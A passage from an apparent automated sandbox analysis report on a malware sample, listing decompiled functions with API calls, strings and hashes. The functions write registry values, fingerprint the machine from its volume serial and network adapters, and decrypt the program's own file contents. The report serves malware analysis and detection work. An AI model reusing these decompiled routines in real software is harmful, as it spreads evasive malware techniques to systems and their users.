							_v12 = 0x80000001;
							_v16 = 0;
							_v20 = 0;
							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
							if(_t43 != 0) {
								E04007D20(_t43, _a8, 0, _a12);
								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
							} else {
								RegCloseKey(_v16); // executed
							}
							_v8 = lstrlenA(_a8);
						}
					}
				}
				return _v8;
			}

0x04005a07
0x04005a12
0x04005a35
0x04005a47
0x04005a5d
0x04005a6f
0x04005a77
0x04005a86
0x04005a8c
0x04005a97
0x04005aa1
0x04005ab9
0x04005ac8
0x04005ace
0x04005ad5
0x04005adc
0x04005b00
0x04005b08
0x04005b20
0x04005b31
0x04005b0a
0x04005b0e
0x04005b0e
0x04005b41
0x04005b41
0x04005ab9
0x04005a86
0x04005b4b

APIs

lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 04005A47

Part of subcall function 04005930: CharUpperA.USER32(00000000), ref: 040059E2

lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
lstrlenA.KERNEL32(00000000), ref: 04005AA1
lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 04005AAE
lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 04005AC8
RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
RegCloseKey.KERNEL32(00000000), ref: 04005B0E
lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 04005B31
lstrlenA.KERNEL32(00000000), ref: 04005B3B

Strings

software\microsoft\windows\currentversion\uninstall, xrefs: 04005B28
Mzsrkvcweomac, xrefs: 04005A30, 04005A42, 04005A4F, 04005AA9, 04005ABF
WDefault, xrefs: 04005A3D

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
String ID: Mzsrkvcweomac$WDefault$software\microsoft\windows\currentversion\uninstall
API String ID: 4161867159-2878899710
Opcode ID: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
Instruction ID: 2f1465acc8a4d9a659e2af8a658b36752d7f83b1b7b92a7dc582af9786930c23
Opcode Fuzzy Hash: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
Instruction Fuzzy Hash: 40310775600208FBEB14DFA4DC49FAA37B9EB44708F04C615FA15BB281D7B8AA50CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004102F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 129threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0041033E

Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0

GetCurrentThreadId.KERNEL32 ref: 00410372
CreateEventA.KERNEL32 ref: 0041039A
GetCurrentProcess.KERNEL32 ref: 004103D9
GetCurrentThread.KERNEL32 ref: 004103DE
GetCurrentProcess.KERNEL32 ref: 004103E6
DuplicateHandle.KERNELBASE ref: 00410415
GetThreadPriority.KERNEL32 ref: 0041042C
TlsSetValue.KERNEL32 ref: 0041045E

Part of subcall function 00414330: strlen.NTDLL ref: 0041433F
Part of subcall function 00414330: memcpy.NTDLL ref: 0041438D
Part of subcall function 00414330: CreateMutexA.KERNEL32 ref: 004143F5
Part of subcall function 00414330: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
Part of subcall function 00414330: FindAtomA.KERNEL32 ref: 00414421
Part of subcall function 00414330: malloc.MSVCRT ref: 00414439
Part of subcall function 00414330: AddAtomA.KERNEL32 ref: 00414463
Part of subcall function 00414330: free.MSVCRT ref: 0041448D
Part of subcall function 00414330: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
Part of subcall function 00414330: CloseHandle.KERNEL32 ref: 004144A1

abort.MSVCRT ref: 004104E4

Strings

X%, xrefs: 004102F9, 0041048E

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Current$Thread$AtomCreateHandleMutexProcessValue$CloseDuplicateEventFindObjectPriorityReleaseSingleWaitabortfprintffreemallocmemcpystrlen
String ID: X%
API String ID: 1502871514-765380288
Opcode ID: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
Instruction ID: 67e3bcb8228b950fd08ff0cec122396874fc9c7fbf7ab65224cae0d0026a9d18
Opcode Fuzzy Hash: b075b49ea6009e85003a55706380fd09abfb21cbb3150e8bee426d7021328223
Instruction Fuzzy Hash: 3B51E8B0A04705DFD720EF69D54835ABBF0BB48304F40892EE99597351D7B8A489CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 04005F30 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 80
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04005F30() {
				char* _v8;
				signed int _v9;
				void* _v16;
				void* _v20;
				char _v284;
				int _v288;
				int _v292;
				char _v324;
				int _v328;
				char* _t27;
				CHAR* _t30;
				long _t37;

				_v9 = 0;
				_t27 =  *0x40118a0; // 0x4013b88
				_v8 = _t27;
				E04007D20(_t27,  &_v284, 0, 0x104);
				lstrcpyA( &_v284, "pigalicapi");
				_t30 =  *0x4011898; // 0x4013fe2
				lstrcatA( &_v284, _t30);
				_v16 = 0x80000001;
				if(( *0x401435a & 0x000000ff) != 0) {
					_v16 = 0x80000002;
				}
				_v20 = 0;
				if(RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20) == 0) {
					_v292 = 0x20;
					_v288 = 0x20;
					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
					if(_t37 == 0) {
						_v9 = 1;
					}
					_t47 = _v9 & 0x000000ff;
					if((_v9 & 0x000000ff) == 0) {
						_v328 = 0x10;
						E04009BD0(_t47,  &_v324, 0x10);
						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10); // executed
					}
					RegCloseKey(_v20); // executed
				}
				return _v9;
			}

0x04005f39
0x04005f3d
0x04005f42
0x04005f53
0x04005f67
0x04005f6d
0x04005f7a
0x04005f80
0x04005f90
0x04005f92
0x04005f92
0x04005f99
0x04005fbb
0x04005fc1
0x04005fcb
0x04005ff2
0x04005ffa
0x04005ffc
0x04005ffc
0x04006000
0x04006006
0x04006008
0x0400601b
0x0400603b
0x0400603b
0x04006045
0x04006045
0x04006051

APIs

lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
RegCloseKey.KERNEL32(00000000), ref: 04006045

Strings

, xrefs: 04005FCB
pigalicapi, xrefs: 04005F5B
, xrefs: 04005FC1

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Value$CloseOpenQuerylstrcatlstrcpy
String ID: $ $pigalicapi
API String ID: 764223185-550099112
Opcode ID: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
Instruction ID: d868066335aa3bc34e1d01a835705104c70e08da6b50357c6a08ba3ec109f492
Opcode Fuzzy Hash: 423ae5761b421ea40ff2c1466760ba86f39da5aff24a2289ecb93b8c70e41592
Instruction Fuzzy Hash: 6F3143B194021CABEB14CF90DC45FFEB7B8EB08704F048598EB04B6181D7B96A85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04004096 Relevance: 15.1, APIs: 10, Instructions: 121
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04004096() {
				void _t92;
				void* _t114;
				void* _t161;
				void* _t163;
				void* _t166;

				L0:
				while(1) {
					L0:
					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
						break;
					}
					L2:
					EnterCriticalSection(_t161 - 0x28);
					if( *(_t161 - 0x30) != 0) {
						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
						 *(_t161 - 0x30) = 0;
						 *(_t161 - 0x2c) = 0;
					}
					_t171 =  *(_t161 - 0x34);
					if( *(_t161 - 0x34) != 0) {
						TerminateThread( *(_t161 - 0x34), 0);
						 *(_t161 - 0x34) = 0;
					}
					ResetEvent( *(_t161 - 0x10));
					LeaveCriticalSection(_t161 - 0x28);
					_t92 = CreateThread(0, 0, E04004AC0, _t161 - 0x34, 0, 0); // executed
					 *(_t161 - 0x34) = _t92;
					 *(_t161 - 0x64) = E040097A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
					E04007D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
					_t166 = _t163 + 0x10;
					 *(_t161 - 0x60) = 0;
					L8:
					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
						E04007D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
						_t166 = _t166 + 0xc;
						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
						 *(_t161 - 0x58) =  *(_t161 + 8);
						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
						} else {
							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
						}
						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
						_t114 = CreateThread(0, 0,  &M04004BA0, _t161 - 0x58, 0, 0); // executed
						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
					}
					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
						 *(_t161 - 1) = 1;
					}
					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
						TerminateThread( *(_t161 - 0x34), 0);
					}
					L17:
					EnterCriticalSection(_t161 - 0x28);
					if( *(_t161 - 0x30) != 0) {
						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
						 *(_t161 - 0x30) = 0;
						 *(_t161 - 0x2c) = 0;
					}
					L19:
					LeaveCriticalSection(_t161 - 0x28);
					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
					E040097C0( *(_t161 - 0x68));
					if(( *(_t161 - 1) & 0x000000ff) == 0) {
						L21:
						continue;
					}
					break;
				}
				L22:
				DeleteCriticalSection(_t161 - 0x28);
				return  *(_t161 - 1);
			}

0x04004096
0x04004096
0x04004096
0x0400409c
0x040040a5
0x00000000
0x00000000
0x040040ab
0x040040af
0x040040b9
0x040040c6
0x040040cc
0x040040d3
0x040040d3
0x040040da
0x040040de
0x040040e6
0x040040ec
0x040040ec
0x040040f7
0x04004101
0x04004118
0x0400411e
0x0400413d
0x04004143
0x04004153
0x04004158
0x0400415b
0x00000000
0x0400416d
0x0400417f
0x0400418e
0x04004193
0x04004199
0x0400419f
0x040041a5
0x040041af
0x040041bb
0x040041d2
0x040041bd
0x040041c7
0x040041c7
0x040041e3
0x040041f7
0x04004203
0x0400420c
0x04004216
0x0400416a
0x0400416a
0x0400422d
0x04004242
0x04004249
0x0400424b
0x0400424b
0x0400425e
0x04004265
0x0400426d
0x0400426d
0x04004273
0x04004277
0x04004281
0x0400428e
0x04004294
0x0400429b
0x0400429b
0x040042a2
0x040042a6
0x040042af
0x040042b6
0x040042c4
0x040042c8
0x00000000
0x040042c8
0x00000000
0x040042c4
0x040042cd
0x040042d1
0x040042dd

APIs

EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
ResetEvent.KERNEL32(00000000), ref: 040040F7
LeaveCriticalSection.KERNEL32(?), ref: 04004101
CreateThread.KERNEL32 ref: 04004118
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
CreateThread.KERNEL32 ref: 040041F7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
FindCloseChangeNotification.KERNEL32(?), ref: 04004216
DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
String ID:
API String ID: 371823443-0
Opcode ID: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
Instruction ID: 702011c11570e1e92260a3d6b56584955ffb64453fe6a6bb8e3d44d087611259
Opcode Fuzzy Hash: 580c7b9ddcd011ba509f7f8c1de4a743a931a1a6ddda21c3e831cc7138ee1551
Instruction Fuzzy Hash: 0E51D7B5A40308AFEB18DF94D899BDDBBB1FB48704F108219F605BB2C0D774A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04004510 Relevance: 13.7, APIs: 9, Instructions: 173
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04004510(intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				char _v780;
				void* _v784;
				char _v1308;
				long _v1312;
				void* _v1316;
				long _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				signed int _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				void* _t90;
				void* _t94;
				int _t97;
				signed char _t101;
				signed char _t114;
				void* _t153;
				void* _t155;
				void* _t156;

				_v5 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L24:
					return _v5;
				} else {
					E04007D20(E04007D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
					_t155 = _t153 + 0x18;
					GetModuleFileNameA(0,  &_v1308, 0x208);
					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v784 = _t90;
					if(_v784 == 0xffffffff) {
						goto L24;
					}
					_v1312 = GetFileSize(_v784, 0);
					if(_v1312 == 0) {
						L22:
						if(_v784 != 0) {
							CloseHandle(_v784);
						}
						goto L24;
					}
					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
					_v1316 = _t94;
					if(_v1316 == 0) {
						goto L22;
					}
					_v1320 = 0;
					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
					if(_t97 == 0 || _v1320 != _v1312) {
						L20:
						if(_v1316 != 0) {
							VirtualFree(_v1316, 0, 0x8000);
							_v1316 = 0;
						}
						goto L22;
					} else {
						FindCloseChangeNotification(_v784); // executed
						_v784 = 0;
						_t101 = E040047F0(_v1316, _v1312, _a8); // executed
						_t156 = _t155 + 0xc;
						if((_t101 & 0x000000ff) == 0) {
							if(_v1316 != 0) {
								VirtualFree(_v1316, 0, 0x8000); // executed
								_v1316 = 0;
							}
							_v1328 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
							_v1324 = _v1328 + ( *(_v1328 + 0x14) & 0x0000ffff) + 0x18;
							_v1332 = 0;
							while(_v1332 < ( *(_v1328 + 6) & 0x0000ffff)) {
								_v1336 =  *((intOrPtr*)(_v1324 + 0xc + _v1332 * 0x28)) + _a4;
								if( *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28)) <=  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28))) {
									_v1344 =  *((intOrPtr*)(_v1324 + 0x10 + _v1332 * 0x28));
								} else {
									_v1344 =  *((intOrPtr*)(_v1324 + 8 + _v1332 * 0x28));
								}
								_v1340 = _v1344;
								_t114 = E040047F0(_v1336, _v1340, _a8); // executed
								_t156 = _t156 + 0xc;
								if((_t114 & 0x000000ff) == 0) {
									_v1332 = _v1332 + 1;
									continue;
								} else {
									_v5 = 1;
									goto L20;
								}
							}
							goto L20;
						}
						_v5 = 1;
						goto L20;
					}
				}
			}

0x0400451a
0x04004522
0x040047e6
0x040047ed
0x04004532
0x04004556
0x0400455b
0x0400456c
0x0400458b
0x04004591
0x0400459e
0x00000000
0x00000000
0x040045b3
0x040045c0
0x040047d0
0x040047d7
0x040047e0
0x040047e0
0x00000000
0x040047d7
0x040045d6
0x040045dc
0x040045e9
0x00000000
0x00000000
0x040045ef
0x04004617
0x0400461f
0x040047a9
0x040047b0
0x040047c0
0x040047c6
0x040047c6
0x00000000
0x04004637
0x0400463e
0x04004644
0x04004660
0x04004665
0x0400466d
0x0400467f
0x0400468f
0x04004695
0x04004695
0x040046a8
0x040046c2
0x040046c8
0x040046e3
0x0400470f
0x0400473b
0x0400476b
0x0400473d
0x04004750
0x04004750
0x04004777
0x0400478f
0x04004794
0x0400479c
0x040046dd
0x00000000
0x0400479e
0x0400479e
0x00000000
0x0400479e
0x0400479c
0x00000000
0x040046e3
0x0400466f
0x00000000
0x0400466f
0x0400461f

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E

Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
Part of subcall function 040047F0: GetLastError.KERNEL32 ref: 04004834
Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
Part of subcall function 040047F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
Part of subcall function 040047F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
Part of subcall function 040047F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
Part of subcall function 040047F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
Part of subcall function 040047F0: CryptDestroyKey.ADVAPI32(00000000), ref: 04004982

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400468F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
CloseHandle.KERNEL32(00000000), ref: 040047E0

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
String ID:
API String ID: 2585753175-0
Opcode ID: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
Instruction ID: c94ea80790bf0b6d8dbf2583483555f7aa9864fa89971da120b97b62dce4532c
Opcode Fuzzy Hash: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
Instruction Fuzzy Hash: 92815D74A056189BEB64CF14DC94BAAB7B4AF49306F0091D9E608BB2C1D774ABC1CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04009D20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 133
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04009D20(intOrPtr _a4, CHAR* _a8, int _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v292;
				intOrPtr _v296;
				char _v404;
				long _v408;
				char _v673;
				char _v676;
				intOrPtr _v680;
				long _v684;
				signed int _v688;
				short* _v692;
				signed int _v696;
				unsigned int _v700;
				intOrPtr _v704;
				char _v900;
				signed int _v904;
				signed int _v908;
				int _v912;
				int _t71;
				void* _t74;
				short** _t76;
				void* _t114;

				_v5 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
					_v12 = 0x20;
					_v24 = 6;
					_v684 = 0;
					_v20 = 0;
					_v408 = 0;
					_v16 = 0x19660d;
					_v296 = 0x3c6ef35f;
					_v680 = _a4;
					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
						_v673 = 0;
						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
						if(_t71 != 0) {
							_v688 = 0xffffffff;
							E04007D20(_t71,  &_v900, 0, 0xc0);
							_v700 = 0;
							_t74 = E04009F70( &_v900, 0xc0,  &_v700); // executed
							if(_t74 != 0) {
								_v904 = 0;
								while(_v904 < _v700 >> 2) {
									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
									_v904 = _v904 + 1;
								}
							}
							_v696 = _v684;
							_v908 = 0;
							while(_v908 < 4) {
								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
								_v908 = _v908 + 1;
							}
							_t76 =  &_v692;
							__imp__StringFromCLSID(_a4, _t76); // executed
							_v704 = _t76;
							if(_v704 >= 0) {
								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
								_v5 = 1;
							}
							__imp__CoTaskMemFree(_v692);
						}
					}
				}
				return _v5;
			}

0x04009d29
0x04009d31
0x04009d4b
0x04009d52
0x04009d59
0x04009d63
0x04009d6a
0x04009d74
0x04009d7b
0x04009d88
0x04009da2
0x04009da8
0x04009ddd
0x04009de5
0x04009deb
0x04009e03
0x04009e0b
0x04009e28
0x04009e32
0x04009e34
0x04009e4f
0x04009e73
0x04009e49
0x04009e49
0x04009e4f
0x04009e81
0x04009e87
0x04009ea2
0x04009ecf
0x04009ee4
0x04009e9c
0x04009e9c
0x04009eec
0x04009ef7
0x04009efd
0x04009f0a
0x04009f2b
0x04009f46
0x04009f4c
0x04009f4c
0x04009f57
0x04009f57
0x04009de5
0x04009da2
0x04009f63

APIs

GetSystemDirectoryA.KERNEL32 ref: 04009D9A
GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD

Part of subcall function 04009F70: GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB

StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 04009F25
lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 04009F46
CoTaskMemFree.OLE32(?), ref: 04009F57

Strings

, xrefs: 04009D4B

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
String ID:
API String ID: 2697952880-3916222277
Opcode ID: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
Instruction ID: 5e89223982a4db5088977870fe710af53f8bde251be69ccbe6f0708d183867dd
Opcode Fuzzy Hash: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
Instruction Fuzzy Hash: 695139B0A043189FEB25CF50CC88BEAB7B9BB44304F14C2D9E5096A281DB74AB84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04001390 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04001390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed char* _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				long _v24;
				void* _v28;
				long _v32;
				signed int _t52;
				signed int _t57;
				intOrPtr _t64;
				void* _t76;
				void* _t103;
				void* _t104;
				void* _t106;
				void* _t107;

				_t52 = __eax;
				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
					return _t52 | 0xffffffff;
				} else {
					_v24 = 0;
					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
					_v28 = _t57;
					if(_v28 != 0) {
						E04007B70(_v28, _a4, _a8);
						E04007B70(_v28 + _a8, "====", 4);
						_t106 = _t104 + 0x18;
						_v8 = _v28;
						_v20 = 3;
						while(_v20 == 3) {
							_v32 = 0;
							while(_v32 < 4) {
								while( *_v8 != 0x3d) {
									_t76 = E04001500( *_v8 & 0x000000ff);
									_t106 = _t106 + 4;
									if(_t76 >= 0) {
										break;
									}
									_v8 =  &(_v8[1]);
								}
								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
								_v8 =  &(_v8[1]);
								_v32 = _v32 + 1;
							}
							_t64 = E04001580( &_v16,  &_v12);
							_t107 = _t106 + 8;
							_v20 = _t64;
							if(_a16 >= _v20) {
								E04007B70(_a12,  &_v12, _v20);
								_t106 = _t107 + 0xc;
								_a12 = _a12 + _v20;
								_a16 = _a16 - _v20;
								_v24 = _v24 + _v20;
								continue;
							}
							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
						}
						HeapFree(GetProcessHeap(), 0, _v28);
						return _v24;
					}
					return _t57 | 0xffffffff;
				}
			}

0x04001390
0x0400139a
0x00000000
0x040013b6
0x040013b6
0x040013cd
0x040013d3
0x040013da
